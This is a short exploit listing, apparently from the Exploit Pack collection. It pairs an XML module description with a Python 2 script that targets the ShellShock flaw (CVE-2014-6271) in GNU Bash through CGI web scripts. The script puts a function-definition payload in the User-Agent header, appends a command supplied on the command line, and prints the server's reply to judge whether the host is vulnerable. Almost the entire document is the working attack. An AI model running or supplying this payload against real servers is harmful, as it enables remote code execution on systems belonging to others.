GNU Bash 4.3 Command Injection
Posted on 30 September 2014
<?xml version="1.0" encoding="UTF-8"?> <Module> <Exploit NameXML="Bash-CMD-Injection" CodeName="BashCMDInjection.py" Platform="linux" Service="http" Type="remote" RemotePort="80" LocalPort= "4444" ShellcodeAvailable="E" ShellPort="4444" SpecialArgs=""> </Exploit> <Information Author="Juan Sacco" Date="Dec 29 2014" Vulnerability= "2014-6271"> GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment. </Information> <Targets> Any Bash 4.43 > and prior </Targets> </Module> # Modified by JSacco - jsacco@exploitpack.com # Exploit Pack 2014 # How to run: checkCVE20146271.py http://www.server.com/script.cgi import urllib2, sys Target = sys.argv[1] Port = int(sys.argv[2]) ShellcodeType = sys.argv[3] Extra = sys.argv[4] print "Check a host: checkbash.py http://www.domain.com/script.cgi" print "Info: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock." print "###########################################################" header = {'User-Agent': '() { :;}; echo Content-type:text/plain;echo;%s' %(Extra)} request = urllib2.Request(Target, '', header) if urllib2.urlopen(request).read().find("www") != -1 or urllib2.urlopen(request).read().find("http") != -1: print "Response from server:", urllib2.urlopen(request).read() print "Seems vulnerable:", Target
